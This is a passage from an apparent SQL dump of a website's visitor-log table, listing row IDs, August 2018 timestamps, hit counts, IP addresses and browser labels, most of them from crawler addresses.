'other'),(283155,1533497349,1,1,0,0,'54.36.148.191','other'),(283156,1533497387,1,1,0,0,'54.36.148.112','other'),(283157,1533497443,1,1,0,0,'54.36.149.21','other'),(283158,1533497542,1,1,0,0,'54.36.149.36','other'),(283159,1533497740,1,1,0,0,'54.36.148.148','other'),(283160,1533497791,3,3,0,0,'216.244.66.241','other'),(283161,1533498409,1,1,0,0,'54.36.149.0','other'),(283162,1533498521,1,1,0,0,'54.36.148.163','other'),(283163,1533498649,1,1,0,0,'54.36.149.101','other'),(283164,1533498650,1,1,0,0,'54.165.59.7','other'),(283165,1533498698,1,1,0,0,'54.36.148.119','other'),(283166,1533498943,1,1,0,0,'216.244.66.241','other'),(283167,1533499058,1,1,0,0,'54.36.148.194','other'),(283168,1533499139,1,1,0,0,'54.36.149.57','other'),(283169,1533499798,1,1,0,0,'54.36.149.40','other'),(283170,1533500016,1,1,0,0,'54.36.149.101','other'),(283171,1533500167,1,1,0,0,'54.36.148.86','other'),(283172,1533500169,1,1,0,0,'77.247.181.163','other'),(283173,1533500575,3,3,0,0,'141.8.142.74','other'),(283174,1533500777,1,1,0,0,'54.36.148.148','other'),(283175,1533500778,2,2,0,0,'216.244.66.241','other'),(283176,1533500860,1,1,0,0,'54.36.149.49','other'),(283177,1533500952,1,1,0,0,'54.36.149.60','other'),(283178,1533501082,1,1,0,0,'54.36.148.58','other'),(283179,1533501166,1,1,0,0,'46.211.158.201','chrome'),(283180,1533501440,1,1,0,0,'54.36.148.119','other'),(283181,1533501857,1,1,0,0,'54.36.149.92','other'),(283182,1533501960,1,1,0,0,'54.36.148.75','other'),(283183,1533502311,1,1,0,0,'54.36.148.215','other'),(283184,1533502381,1,1,0,0,'54.36.148.172','other'),(283185,1533502670,1,1,0,0,'54.36.148.246','other'),(283186,1533502694,1,1,0,0,'46.211.110.143','other'),(283187,1533502930,1,1,0,0,'54.36.148.83','other'),(283188,1533502951,1,1,0,0,'54.36.148.16','other'),(283189,1533502982,1,1,0,0,'54.36.148.116','other'),(283190,1533503108,1,1,0,0,'54.36.149.41','other'),(283191,1533503184,1,1,0,0,'66.249.66.155','chrome'),(283192,1533503186,1,1,0,0,'66.249.66.57','chrome'),(283193,1533503188,1,0,1,0,'66.249.66.157',''),(283194,1533503367,1,1,0,0,'54.36.148.18','other'),(283195,1533503515,1,1,0,0,'54.36.148.140','other'),(283196,1533503803,1,1,0,0,'54.36.148.224','other'),(283197,1533503971,1,1,0,0,'54.36.148.227','other'),(283198,1533504299,1,1,0,0,'54.36.148.41','other'),(283199,1533504557,1,1,0,0,'54.36.148.65','other'),(283200,1533504595,2,2,0,0,'54.36.148.36','other'),(283201,1533504613,1,1,0,0,'54.36.149.26','other'),(283202,1533505002,1,1,0,0,'54.36.148.88','other'),(283203,1533505335,1,1,0,0,'54.36.148.96','other'),(283204,1533505364,1,1,0,0,'54.36.148.156','other'),(283205,1533505471,1,1,0,0,'54.36.148.160','other'),(283206,1533505509,1,1,0,0,'54.36.149.20','other'),(283207,1533505529,1,1,0,0,'54.36.149.74','other'),(283208,1533505594,1,1,0,0,'54.36.148.90','other'),(283209,1533505625,1,1,0,0,'8.29.198.26','other'),(283210,1533505632,1,1,0,0,'54.36.148.208','other'),(283211,1533505916,1,1,0,0,'54.36.148.110','other'),(283212,1533506017,1,1,0,0,'54.36.149.68','other'),(283213,1533506064,1,1,0,0,'216.244.66.241','other'),(283214,1533506148,1,1,0,0,'141.8.142.74','other'),(283215,1533506357,1,1,0,0,'54.36.149.3','other'),(283216,1533506513,1,1,0,0,'95.163.255.154','other'),(283217,1533506549,1,1,0,0,'54.36.148.101','other'),(283218,1533506575,1,1,0,0,'54.36.148.60','other'),(283219,1533506597,1,1,0,0,'54.36.148.175','other'),(283220,1533506634,1,1,0,0,'54.36.149.44','other'),(283221,1533506952,1,1,0,0,'54.36.148.37','other'),(283222,1533506991,1,1,0,0,'54.36.148.55','other'),(283223,1533506995,2,2,0,0,'216.244.66.241','other'),(283224,1533507190,1,1,0,0,'54.36.148.193','other'),(283225,1533507214,1,1,0,0,'54.36.149.43','other'),(283226,1533507280,1,1,0,0,'8.29.198.27','other'),(283227,1533507281,1,1,0,0,'178.154.171.88','other'),(283228,1533507315,1,1,0,0,'40.77.167.114','other'),(283229,1533507325,1,1,0,0,'54.36.148.213','other'),(283230,1533507349,1,1,0,0,'79.137.68.85','other'),(283231,1533507470,1,0,1,0,'66.249.66.156',''),(283232,1533507620,1,1,0,0,'54.36.148.152','other'),(283233,1533507851,1,1,0,0,'54.36.148.76','other'),(283234,1533507885,1,1,0,0,'54.36.149.64','other'),(283235,1533507901,1,1,0,0,'54.36.149.22','other'),(283236,1533507952,1,1,0,0,'54.36.149.5','other'),(283237,1533507989,1,1,0,0,'54.36.148.208','other'),(283238,1533508166,1,1,0,0,'54.36.149.14','other'),(283239,1533508542,1,1,0,0,'54.36.148.133','other'),(283240,1533508715,1,1,0,0,'54.36.149.74','other'),(283241,1533508862,2,2,0,0,'216.244.66.241','other'),(283242,1533509064,1,1,0,0,'54.36.149.86','other'),(283243,1533509436,1,1,0,0,'54.36.148.78','other'),(283244,1533509996,1,1,0,0,'54.36.149.66','other'),(283245,1533510144,1,1,0,0,'54.36.148.175','other'),(283246,1533510381,1,1,0,0,'40.77.167.114','other'),(283247,1533510431,1,1,0,0,'54.36.148.67','other'),(283248,1533510930,1,1,0,0,'185.220.101.7','other'),(283249,1533511026,1,1,0,0,'54.36.148.26','other'),(283250,1533511089,1,1,0,0,'54.36.148.160','other'),(283251,1533511122,1,1,0,0,'54.36.149.39','other'),(283252,1533511147,1,1,0,0,'178.154.171.88','other'),(283253,1533511148,2,2,0,0,'54.36.149.45','other'),(283254,1533511333,1,1,0,0,'216.244.66.241','other'),(283255,1533511342,1,1,0,0,'54.36.148.101','other'),(283256,1533512641,1,1,0,0,'54.36.148.113','other'),(283257,1533512683,1,1,0,0,'54.36.148.22','other'),(283258,1533512999,1,1,0,0,'54.36.148.222','other'),(283259,1533513011,1,1,0,0,'54.36.148.78','other'),(283260,1533513101,1,1,0,0,'18.237.224.233','chrome'),(283261,1533513272,1,1,0,0,'54.36.148.143','other'),(283262,1533513305,1,1,0,0,'66.249.66.57','chrome'),(283263,1533513307,1,1,0,0,'66.249.66.156','chrome'),(283264,1533513491,1,1,0,0,'54.36.148.229','other'),(283265,1533513893,1,1,0,0,'54.36.148.223','other'),(283266,1533513906,2,2,0,0,'54.36.149.68','other'),(283267,1533514078,1,1,0,0,'216.244.66.241','other'),(283268,1533514540,1,1,0,0,'54.36.148.156','other'),(283269,1533514550,1,1,0,0,'54.36.149.48','other'),(283270,1533514552,1,1,0,0,'46.20.35.114','other'),(283271,1533514992,1,1,0,0,'216.244.66.241','other'),(283272,1533514993,1,1,0,0,'54.36.148.128','other'),(283273,1533515436,1,0,1,0,'66.249.66.155',''),(283274,1533515461,1,1,0,0,'54.36.148.216','other'),(283275,1533515936,1,1,0,0,'54.36.148.53','other'),(283276,1533516100,1,1,0,0,'54.36.148.110','other'),(283277,1533516126,2,2,0,0,'40.77.167.114','other'),(283278,1533516477,1,1,0,0,'8.29.198.26','other'),(283279,1533516725,1,1,0,0,'163.172.4.153','chrome'),(283280,1533516893,1,1,0,0,'54.36.148.120','other'),(283281,1533516994,1,1,0,0,'54.36.148.36','other'),(283282,1533517184,1,1,0,0,'178.154.171.88','other'),(283283,1533517360,1,1,0,0,'216.244.66.241','other'),(283284,1533517425,1,1,0,0,'54.36.148.165','other'),(283285,1533518030,1,1,0,0,'54.36.149.20','other'),(283286,1533518084,1,1,0,0,'54.36.149.58','other'),(283287,1533518117,1,1,0,0,'8.29.198.26','other'),(283288,1533518325,1,1,0,0,'54.36.148.245','other'),(283289,1533518414,1,1,0,0,'54.36.148.62','other'),(283290,1533518429,1,1,0,0,'54.36.149.80','other'),(283291,1533518452,1,1,0,0,'54.36.149.74','other'),(283292,1533518704,2,2,0,0,'216.244.66.241','other'),(283293,1533518883,1,1,0,0,'54.36.149.93','other'),(283294,1533519138,1,1,0,0,'54.36.148.88','other'),(283295,1533519594,1,1,0,0,'91.209.11.236','other'),(283296,1533519703,1,1,0,0,'54.36.148.73','other'),(283297,1533519716,1,1,0,0,'54.36.148.219','other'),(283298,1533519786,1,1,0,0,'54.36.148.117','other'),(283299,1533519865,2,2,0,0,'216.244.66.241','other'),(283300,1533519886,1,1,0,0,'54.36.149.91','other'),(283301,1533519889,1,1,0,0,'52.41.211.72','chrome'),(283302,1533519915,1,1,0,0,'54.36.149.27','other'),(283303,1533519962,1,1,0,0,'178.154.171.88','other'),(283304,1533520032,1,1,0,0,'54.36.149.57','other'),(283305,1533520212,1,1,0,0,'54.36.148.236','other'),(283306,1533520281,2,2,0,0,'54.36.148.232','other'),(283307,1533520323,1,1,0,0,'54.36.148.150','other'),(283308,1533520405,1,1,0,0,'54.36.148.94','other'),(283309,1533520458,1,1,0,0,'54.36.149.30','other'),(283310,1533520474,1,1,0,0,'54.36.148.241','other'),(283311,1533520500,1,1,0,0,'40.77.167.114','other'),(283312,1533520733,1,1,0,0,'141.8.142.74','other'),(283313,1533521095,1,1,0,0,'216.244.66.241','other'),(283314,1533521224,1,1,0,0,'54.36.148.83','other'),(283315,1533521526,1,1,0,0,'54.36.148.31','other'),(283316,1533521733,1,1,0,0,'46.182.18.29','other'),(283317,1533521803,1,1,0,0,'141.8.142.74','other'),(283318,1533521925,1,1,0,0,'157.55.39.190','other'),(283319,1533522095,1,1,0,0,'180.76.15.24','other'),(283320,1533522127,1,1,0,0,'54.36.148.97','other'),(283321,1533522235,1,1,0,0,'54.36.148.12','other'),(283322,1533522623,1,1,0,0,'54.36.148.168','other'),(283323,1533522630,1,0,1,0,'66.249.66.155',''),(283324,1533523020,106,106,0,0,'148.251.244.137','other'),(283325,1533523406,1,1,0,0,'54.36.148.127','other'),(283326,1533523601,1,1,0,0,'54.36.148.39','other'),(283327,1533523731,1,1,0,0,'54.36.148.83','other'),(283328,1533523775,1,1,0,0,'54.36.148.221','other'),(283329,1533523886,1,1,0,0,'54.36.149.73','other'),(283330,1533524039,1,1,0,0,'54.36.149.35','other'),(283331,1533524122,1,1,0,0,'54.36.148.178','other'),(283332,1533524449,1,1,0,0,'216.244.66.241','other'),(283333,1533524508,1,1,0,0,'37.9.113.182','other'),(283334,1533524820,1,1,0,0,'54.36.148.255','other'),(283335,1533525270,1,1,0,0,'141.8.142.74','other'),(283336,1533525321,1,1,0,0,'51.15.80.14','other'),(283337,1533525350,1,1,0,0,'54.36.148.190','other'),(283338,1533525530,1,1,0,0,'54.36.149.65','other'),(283339,1533525690,1,1,0,0,'54.36.148.248','other'),(283340,1533526149,1,1,0,0,'54.36.149.90','other'),(283341,1533526344,1,1,0,0,'54.36.148.25','other'),(283342,1533526585,1,1,0,0,'54.36.148.130','other'),(283343,1533526840,1,1,0,0,'54.36.148.204','other'),(283344,1533526877,1,1,0,0,'54.36.148.140','other'),(283345,1533526980,1,1,0,0,'54.36.148.54','other'),(283346,1533527015,1,1,0,0,'54.36.148.164','other'),(283347,1533527126,1,1,0,0,'54.36.148.166','other'),(283348,1533527311,1,1,0,0,'8.29.198.27','other'),(283349,1533527477,1,1,0,0,'54.36.148.253','other'),(283350,1533527484,1,0,1,0,'66.249.66.155',''),(283351,1533527500,1,1,0,0,'54.36.148.172','other'),(283352,1533527722,1,1,0,0,'180.76.15.157','other'),(283353,1533527808,1,1,0,0,'54.36.148.186','other'),(283354,1533528082,1,1,0,0,'54.36.148.249','other'),(283355,1533528310,1,1,0,0,'54.36.148.18','other'),(283356,1533528635,1,1,0,0,'54.36.149.76','other'),(283357,1533528814,1,1,0,0,'72.29.127.20','firefox'),(283358,1533528836,1,1,0,0,'141.8.142.74','other'),(283359,1533528916,1,1,0,0,'185.220.101.34','other'),(283360,1533528958,1,1,0,0,'8.29.198.27','other'),(283361,1533529410,1,1,0,0,'54.36.149.19','other'),(283362,1533529432,1,1,0,0,'54.36.148.218','other'),(283363,1533529482,1,1,0,0,'66.249.66.61','chrome'),(283364,1533529483,1,1,0,0,'66.249.66.156','chrome'),(283365,1533529529,1,1,0,0,'54.36.148.226','other'),(283366,1533529625,4,4,0,0,'216.244.66.241','other'),(283367,1533530038,1,1,0,0,'54.36.148.25','other'),(283368,1533530278,1,1,0,0,'54.36.149.3','other'),(283369,1533531045,1,1,0,0,'54.36.148.93','other'),(283370,1533531118,1,1,0,0,'54.36.148.97','other'),(283371,1533531265,1,1,0,0,'54.36.149.67','other'),(283372,1533531286,1,1,0,0,'51.255.65.46','other'),(283373,1533531304,1,0,1,0,'66.249.66.157',''),(283374,1533531444,1,0,1,0,'66.249.66.155',''),(283375,1533531482,1,1,0,0,'216.244.66.241','other'),(283376,1533531639,1,1,0,0,'54.36.148.158','other'),(283377,1533531976,2,2,0,0,'91.196.178.80','chrome'),(283378,1533532038,1,0,1,0,'66.249.66.156',''),(283379,1533532303,1,1,0,0,'54.36.148.205','other'),(283380,1533532307,1,1,0,0,'91.196.178.169','chrome'),(283381,1533532507,1,1,0,0,'141.8.142.74','other'),(283382,1533532531,1,1,0,0,'185.220.102.6','other'),(283383,1533532703,2,2,0,0,'54.36.148.231','other'),(283384,1533533419,1,1,0,0,'54.36.148.141','other'),(283385,1533533432,1,1,0,0,'54.36.148.189','other'),(283386,1533533601,1,1,0,0,'91.196.177.46','chrome'),(283387,1533533713,1,1,0,0,'54.36.148.122','other'),(283388,1533533753,1,1,0,0,'54.36.148.194','other'),(283389,1533533824,1,1,0,0,'54.36.148.193','other'),(283390,1533533829,2,2,0,0,'54.36.149.7','other'),(283391,1533533881,2,2,0,0,'216.244.66.241','other'),(283392,1533533978,1,1,0,0,'54.36.148.78','other'),(283393,1533534047,1,1,0,0,'95.163.255.179','other'),(283394,1533534123,2,2,0,0,'91.196.178.130','chrome'),(283395,1533534185,1,1,0,0,'54.36.149.77','other'),(283396,1533534275,1,1,0,0,'54.36.148.244','other'),(283397,1533534395,1,1,0,0,'54.36.148.184','other'),(283398,1533534412,1,1,0,0,'54.36.148.151','other'),(283399,1533534473,1,1,0,0,'141.8.142.74','other'),(283400,1533534685,1,0,1,0,'66.249.66.157',''),(283401,1533534691,1,1,0,0,'54.36.148.116','other'),(283402,1533534761,2,2,0,0,'207.46.13.188','other'),(283403,1533534768,1,1,0,0,'54.36.148.132','other'),(283404,1533534888,1,1,0,0,'54.36.148.227','other'),(283405,1533534934,1,1,0,0,'54.36.148.73','other'),(283406,1533535044,1,1,0,0,'54.36.148.123','other'),(283407,1533535174,1,1,0,0,'54.36.148.74','other'),(283408,1533535251,1,1,0,0,'54.36.148.70','other'),(283409,1533535303,1,1,0,0,'195.69.221.54','chrome'),(283410,1533535315,1,1,0,0,'216.244.66.241','other'),(283411,1533535397,1,1,0,0,'54.36.148.117','other'),(283412,1533535484,1,1,0,0,'54.36.148.30','other'),(283413,1533535604,1,1,0,0,'141.8.142.74','other'),(283414,1533535626,1,1,0,0,'91.196.178.181','chrome'),(283415,1533536047,2,2,0,0,'195.230.119.59','chrome'),(283416,1533536117,1,1,0,0,'54.36.148.132','other'),(283417,1533536197,1,1,0,0,'54.36.148.123','other'),(283418,1533536320,1,1,0,0,'54.36.148.96','other'),(283419,1533536635,2,0,2,0,'66.249.66.157',''),(283420,1533536692,1,1,0,0,'54.36.148.91','other'),(283421,1533536694,1,1,0,0,'54.36.148.165','other'),(283422,1533536724,1,1,0,0,'66.102.9.38','chrome'),(283423,1533536749,1,1,0,0,'54.36.149.6','other'),(283424,1533536800,1,1,0,0,'54.36.148.196','other'),(283425,1533536993,1,1,0,0,'141.8.142.74','other'),(283426,1533537015,1,1,0,0,'54.36.148.119','other'),(283427,1533537027,1,1,0,0,'54.36.149.52','other'),(283428,1533537187,2,2,0,0,'216.244.66.241','other'),(283429,1533537197,1,1,0,0,'54.36.148.61','other'),(283430,1533537213,1,1,0,0,'54.36.148.217','other'),(283431,1533537298,1,1,0,0,'54.36.148.140','other'),(283432,1533537347,1,1,0,0,'54.36.149.83','other'),(283433,1533537361,1,1,0,0,'54.36.148.141','other'),(283434,1533537897,1,1,0,0,'54.36.149.9','other'),(283435,1533538160,1,1,0,0,'8.29.198.26','other'),(283436,1533538732,1,1,0,0,'54.36.148.250','other'),(283437,1533538733,1,1,0,0,'54.36.149.11','other'),(283438,1533538740,1,1,0,0,'92.112.125.72','chrome'),(283439,1533538913,1,1,0,0,'54.36.149.6','other'),(283440,1533538992,1,1,0,0,'54.36.149.17','other'),(283441,1533539085,1,1,0,0,'54.36.148.169','other'),(283442,1533539096,1,1,0,0,'54.36.148.232','other'),(283443,1533539224,1,1,0,0,'95.132.12.241','firefox'),(283444,1533539248,1,1,0,0,'54.36.149.100','other'),(283445,1533539561,1,1,0,0,'54.36.148.175','other'),(283446,1533539724,1,1,0,0,'178.17.166.149','other'),(283447,1533539811,1,1,0,0,'8.29.198.25','other'),(283448,1533539837,1,1,0,0,'54.36.148.231','other'),(283449,1533539948,1,1,0,0,'37.54.170.35','firefox'),(283450,1533539994,1,1,0,0,'216.244.66.241','other'),(283451,1533540897,1,1,0,0,'54.36.149.4','other'),(283452,1533540973,1,1,0,0,'95.134.184.235','chrome'),(283453,1533541064,1,1,0,0,'54.36.148.32','other'),(283454,1533541080,1,1,0,0,'54.36.148.71','other'),(283455,1533541089,1,1,0,0,'157.55.39.190','other'),(283456,1533541163,1,0,1,0,'66.249.66.156',''),(283457,1533541383,1,1,0,0,'91.196.178.172','chrome'),(283458,1533541415,1,1,0,0,'54.36.148.46','other'),(283459,1533541422,1,1,0,0,'54.36.148.41','other'),(283460,1533541563,2,2,0,0,'66.249.66.155','chrome'),(283461,1533541792,1,1,0,0,'54.36.148.212','other'),(283462,1533541982,1,1,0,0,'54.36.148.190','other'),(283463,1533542004,1,1,0,0,'54.36.148.179','other'),(283464,1533542008,1,1,0,0,'54.36.148.254','other'),(283465,1533542129,1,1,0,0,'54.36.148.27','other'),(283466,1533542169,1,1,0,0,'95.133.194.181','chrome'),(283467,1533542285,3,3,0,0,'216.244.66.241','other'),(283468,1533542365,1,1,0,0,'91.196.177.15','chrome'),(283469,1533542371,1,1,0,0,'54.36.148.75','other'),(283470,1533542434,1,1,0,0,'66.249.66.61','chrome'),(283471,1533542503,1,1,0,0,'54.36.149.34','other'),(283472,1533542776,1,1,0,0,'54.36.149.22','other'),(283473,1533542870,1,1,0,0,'54.36.148.255','other'),(283474,1533542925,1,1,0,0,'54.36.148.223','other'),(283475,1533542989,1,1,0,0,'54.36.148.200','other'),(283476,1533543103,1,1,0,0,'54.36.148.35','other'),(283477,1533543168,1,1,0,0,'54.36.148.237','other'),(283478,1533543218,1,1,0,0,'54.36.149.44','other'),(283479,1533543332,1,1,0,0,'54.36.148.214','other'),(283480,1533543417,1,1,0,0,'95.163.255.96','other'),(283481,1533543585,1,1,0,0,'54.36.148.78','other'),(283482,1533543629,1,1,0,0,'54.36.148.145','other'),(283483,1533543648,1,1,0,0,'54.36.149.48','other'),(283484,1533543716,1,1,0,0,'91.196.178.102','chrome'),(283485,1533544533,1,1,0,0,'54.36.149.75','other'),(283486,1533544545,1,1,0,0,'95.163.255.197','other'),(283487,1533544659,1,1,0,0,'40.77.167.114','other'),(283488,1533544735,1,1,0,0,'54.36.149.10','other'),(283489,1533544833,1,1,0,0,'54.36.148.155','other'),(283490,1533544845,1,1,0,0,'54.36.149.95','other'),(283491,1533544971,4,4,0,0,'216.244.66.241','other'),(283492,1533545015,1,1,0,0,'207.46.13.188','other'),(283493,1533545029,2,2,0,0,'91.196.178.80','chrome'),(283494,1533545106,1,1,0,0,'54.36.148.199','other'),(283495,1533545182,1,1,0,0,'54.36.149.54','other'),(283496,1533545608,1,0,1,0,'66.249.66.156',''),(283497,1533545908,2,0,2,0,'66.249.66.155',''),(283498,1533546199,1,1,0,0,'77.111.244.26','chrome'),(283499,1533546345,1,1,0,0,'54.36.148.73','other'),(283500,1533546519,2,2,0,0,'54.165.59.7','other'),(283501,1533546844,1,1,0,0,'54.36.148.175','other'),(283502,1533546865,1,1,0,0,'54.36.148.192','other'),(283503,1533546949,1,1,0,0,'89.31.57.5','other'),(283504,1533546990,1,1,0,0,'91.79.15.193','firefox'),(283505,1533547426,2,1,1,0,'66.249.66.156',''),(283506,1533547538,1,1,0,0,'54.36.148.252','other'),(283507,1533547555,1,1,0,0,'54.36.149.3','other'),(283508,1533547678,1,1,0,0,'54.36.148.47','other'),(283509,1533547701,1,0,1,0,'66.249.66.155',''),(283510,1533547808,1,1,0,0,'54.36.149.78','other'),(283511,1533547824,2,0,2,0,'66.249.66.157',''),(283512,1533547956,2,2,0,0,'216.244.66.241','other'),(283513,1533548273,1,1,0,0,'54.36.148.73','other'),(283514,1533548322,1,1,0,0,'91.196.178.88','firefox'),(283515,1533548535,1,1,0,0,'66.249.66.59','chrome'),(283516,1533548570,1,1,0,0,'66.249.66.155','chrome'),(283517,1533548892,1,1,0,0,'91.196.178.132','chrome'),(283518,1533548899,1,1,0,0,'54.36.148.79','other'),(283519,1533549020,1,1,0,0,'54.36.148.151','other'),(283520,1533549041,1,1,0,0,'8.29.198.27','other'),(283521,1533549107,3,3,0,0,'37.73.229.40','other'),(283522,1533549260,1,1,0,0,'54.36.148.33','other'),(283523,1533549559,1,1,0,0,'54.36.148.110','other'),(283524,1533549853,1,1,0,0,'54.36.149.21','other'),(283525,1533549858,1,1,0,0,'54.36.148.10','other'),(283526,1533549921,1,1,0,0,'54.36.149.62','other'),(283527,1533549966,1,1,0,0,'54.36.149.79','other'),(283528,1533550118,1,1,0,0,'54.36.149.81','other'),(283529,1533550208,1,1,0,0,'54.36.148.105','other'),(283530,1533550285,1,0,1,0,'66.249.66.155',''),(283531,1533550348,4,4,0,0,'216.244.66.241','other'),(283532,1533550432,1,1,0,0,'54.36.149.66','other'),(283533,1533550528,1,1,0,0,'51.15.63.43','other'),(283534,1533550530,1,1,0,0,'54.36.148.234','other'),(283535,1533550628,1,1,0,0,'86.206.64.209','firefox'),(283536,1533550650,1,1,0,0,'8.29.198.26','other'),(283537,1533550692,1,1,0,0,'54.36.149.13','other'),(283538,1533550722,1,1,0,0,'162.210.196.129','other'),(283539,1533550723,1,1,0,0,'54.36.149.96','other'),(283540,1533551080,1,1,0,0,'54.36.148.157','other'),(283541,1533551134,1,1,0,0,'54.36.149.37','other'),(283542,1533551488,1,1,0,0,'54.36.148.126','other'),(283543,1533551638,1,1,0,0,'54.36.149.55','other'),(283544,1533551827,1,1,0,0,'54.36.149.28','other'),(283545,1533552183,1,1,0,0,'54.36.148.139','other'),(283546,1533552294,3,3,0,0,'216.244.66.241','other'),(283547,1533552363,1,1,0,0,'91.196.178.187','chrome'),(283548,1533552566,1,1,0,0,'54.36.148.234','other'),(283549,1533552706,1,1,0,0,'95.163.255.96','other'),(283550,1533552746,1,1,0,0,'54.36.148.142','other'),(283551,1533553005,1,1,0,0,'54.36.148.26','other'),(283552,1533553251,1,1,0,0,'54.36.148.144','other'),(283553,1533553330,1,1,0,0,'54.36.149.58','other'),(283554,1533553359,1,1,0,0,'54.36.148.168','other'),(283555,1533553600,1,1,0,0,'54.36.149.56','other'),(283556,1533553615,1,1,0,0,'54.36.149.55','other'),(283557,1533553732,1,1,0,0,'54.36.148.106','other'),(283558,1533553910,1,1,0,0,'54.36.148.34','other'),(283559,1533554130,1,1,0,0,'193.169.145.66','other'),(283560,1533554224,1,1,0,0,'54.36.148.142','other'),(283561,1533554254,1,1,0,0,'54.36.148.126','other'),(283562,1533554900,1,1,0,0,'54.36.149.85','other'),(283563,1533554983,1,1,0,0,'91.196.178.102','chrome'),(283564,1533554994,1,1,0,0,'54.36.148.29','other'),(283565,1533555306,1,1,0,0,'91.196.178.75','chrome'),(283566,1533555380,4,4,0,0,'216.244.66.241','other'),(283567,1533555399,1,1,0,0,'54.36.149.103','other'),(283568,1533555407,1,1,0,0,'54.36.148.196','other'),(283569,1533555451,1,1,0,0,'66.249.66.57','chrome'),(283570,1533555457,1,1,0,0,'66.249.66.155','chrome'),(283571,1533555522,1,1,0,0,'54.36.148.147','other'),(283572,1533556005,1,1,0,0,'141.8.142.74','other'),(283573,1533556092,1,1,0,0,'54.36.149.40','other'),(283574,1533556234,1,1,0,0,'54.36.149.106','other'),(283575,1533556596,1,1,0,0,'54.36.149.44','other'),(283576,1533556696,1,1,0,0,'54.36.148.93','other'),(283577,1533557064,1,1,0,0,'54.36.148.165','other'),(283578,1533557104,1,1,0,0,'141.8.142.74','other'),(283579,1533557204,1,0,1,0,'66.249.66.155',''),(283580,1533557382,1,1,0,0,'54.36.148.103','other'),(283581,1533557586,1,0,1,0,'66.249.66.156',''),(283582,1533557615,1,1,0,0,'54.36.148.110','other'),(283583,1533557622,1,1,0,0,'91.196.178.80','chrome'),(283584,1533557635,1,1,0,0,'54.36.149.33','other'),(283585,1533557680,1,1,0,0,'54.36.149.99','other'),(283586,1533557752,1,1,0,0,'46.165.254.166','other'),(283587,1533557889,1,1,0,0,'216.244.66.241','other'),(283588,1533558425,1,1,0,0,'91.196.178.187','chrome'),(283589,1533558530,1,1,0,0,'5.45.207.82','other'),(283590,1533558739,1,1,0,0,'95.163.255.195','other'),(283591,1533558905,1,1,0,0,'216.244.66.241','other'),(283592,1533558935,1,1,0,0,'54.36.148.220','other'),(283593,1533559461,1,1,0,0,'141.8.142.74','other'),(283594,1533559566,1,1,0,0,'54.36.148.57','other'),(283595,1533559737,1,1,0,0,'54.36.148.178','other'),(283596,1533559840,1,1,0,0,'37.53.80.50','firefox'),(283597,1533559989,1,1,0,0,'8.29.198.25','other'),(283598,1533560132,1,1,0,0,'91.233.49.254','chrome'),(283599,1533560574,1,1,0,0,'54.36.148.93','other'),(283600,1533560787,1,1,0,0,'54.36.148.206','other'),(283601,1533560986,1,1,0,0,'54.36.148.144','other'),(283602,1533561225,1,1,0,0,'54.36.148.168','other'),(283603,1533561365,1,1,0,0,'77.247.181.165','other'),(283604,1533561383,1,0,1,0,'66.249.66.155',''),(283605,1533561619,1,1,0,0,'8.29.198.25','other'),(283606,1533562448,1,0,1,0,'66.249.66.155',''),(283607,1533562456,1,0,1,0,'66.249.66.156',''),(283608,1533562492,1,1,0,0,'54.36.149.76','other'),(283609,1533562615,2,2,0,0,'91.196.177.46','chrome'),(283610,1533562695,1,1,0,0,'54.36.148.49','other'),(283611,1533562711,1,1,0,0,'91.196.178.80','chrome'),(283612,1533563052,1,1,0,0,'54.36.148.174','other'),(283613,1533563193,1,1,0,0,'54.36.148.24','other'),(283614,1533563235,2,2,0,0,'216.244.66.241','other'),(283615,1533563356,1,1,0,0,'54.36.148.200','other'),(283616,1533563365,1,1,0,0,'66.249.66.61','chrome'),(283617,1533563398,1,1,0,0,'54.36.148.121','other'),(283618,1533563893,1,1,0,0,'91.196.178.80','chrome'),(283619,1533564006,1,1,0,0,'92.113.41.17','chrome'),(283620,1533564052,1,1,0,0,'178.154.171.88','other'),(283621,1533564087,1,1,0,0,'54.36.148.170','other'),(283622,1533564155,1,1,0,0,'216.244.66.241','other'),(283623,1533564424,1,1,0,0,'37.55.218.101','firefox'),(283624,1533564499,1,1,0,0,'54.36.148.111','other'),(283625,1533564523,1,1,0,0,'193.150.6.27','chrome'),(283626,1533564642,1,1,0,0,'54.36.149.101','other'),(283627,1533564738,2,1,1,0,'66.249.66.156',''),(283628,1533564876,1,1,0,0,'54.36.148.11','other'),(283629,1533564925,1,1,0,0,'176.31.208.193','other'),(283630,1533565224,1,1,0,0,'178.154.171.88','other'),(283631,1533565238,1,1,0,0,'54.36.149.46','other'),(283632,1533565288,1,1,0,0,'54.36.148.191','other'),(283633,1533565307,1,1,0,0,'54.36.148.213','other'),(283634,1533565484,1,0,1,0,'66.249.66.157',''),(283635,1533565574,1,1,0,0,'54.36.148.27','other'),(283636,1533565647,1,1,0,0,'54.36.149.33','other'),(283637,1533565759,4,4,0,0,'216.244.66.241','other'),(283638,1533565998,1,1,0,0,'54.36.149.41','other'),(283639,1533566090,1,1,0,0,'54.36.148.53','other'),(283640,1533566183,1,1,0,0,'130.180.208.74','chrome'),(283641,1533566359,1,1,0,0,'54.36.148.80','other'),(283642,1533566430,1,1,0,0,'46.201.173.150','firefox'),(283643,1533566497,1,1,0,0,'54.36.149.82','other'),(283644,1533566690,1,1,0,0,'54.36.148.106','other'),(283645,1533567220,1,1,0,0,'54.36.148.52','other'),(283646,1533567376,1,1,0,0,'54.36.148.90','other'),(283647,1533567449,1,1,0,0,'54.36.149.40','other'),(283648,1533567475,1,1,0,0,'54.36.148.118','other'),(283649,1533568002,1,1,0,0,'54.36.148.137','other'),(283650,1533568538,1,1,0,0,'77.247.181.165','other'),(283651,1533568586,3,3,0,0,'216.244.66.241','other'),(283652,1533568657,1,1,0,0,'188.32.213.55','msie'),(283653,1533568705,1,1,0,0,'54.36.149.86','other'),(283654,1533568737,2,2,0,0,'141.8.142.74','other'),(283655,1533568992,1,1,0,0,'54.36.149.94','other'),(283656,1533569005,1,1,0,0,'54.36.148.255','other'),(283657,1533569162,1,1,0,0,'54.36.149.6','other'),(283658,1533569379,1,1,0,0,'54.36.148.60','other'),(283659,1533569467,1,0,1,0,'66.249.66.155',''),(283660,1533569470,1,1,0,0,'54.36.148.202','other'),(283661,1533569634,1,1,0,0,'54.36.149.102','other'),(283662,1533570135,1,1,0,0,'54.36.149.4','other'),(283663,1533570316,2,2,0,0,'178.154.171.88','other'),(283664,1533570787,1,1,0,0,'92.113.189.235','chrome'),(283665,1533570886,1,1,0,0,'54.36.148.194','other'),(283666,1533570894,1,1,0,0,'8.29.198.27','other'),(283667,1533570969,1,1,0,0,'66.249.66.155','chrome'),(283668,1533571416,1,1,0,0,'87.250.224.46','other'),